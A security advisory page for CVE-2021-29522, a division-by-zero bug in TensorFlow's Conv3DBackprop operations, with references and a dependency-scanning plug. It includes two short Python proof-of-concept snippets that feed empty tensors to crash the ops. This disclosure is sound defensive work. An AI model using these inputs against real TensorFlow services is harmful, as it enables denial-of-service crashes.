CVE-2021-29522: Division by 0 in `Conv3DBackprop*`
(updated )
The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0:
import tensorflow as tf
input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32)
filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32)
out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])
import tensorflow as tf
input_sizes = tf.constant([1], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
filter_tensor = tf.constant([0, 0, 0, 1, 0], shape=[5], dtype=tf.int32)
out_backprop = tf.constant([], shape=[1, 1, 1, 1, 0], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropFilterV2(input=input_sizes, filter_sizes=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])
References
- github.com/advisories/GHSA-c968-pq7h-7fxv
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-450.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-648.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-159.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/311403edbc9816df80274bd1ea8b3c0c0f22c3fa
- github.com/tensorflow/tensorflow/security/advisories/GHSA-c968-pq7h-7fxv
- nvd.nist.gov/vuln/detail/CVE-2021-29522
Detect and mitigate CVE-2021-29522 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →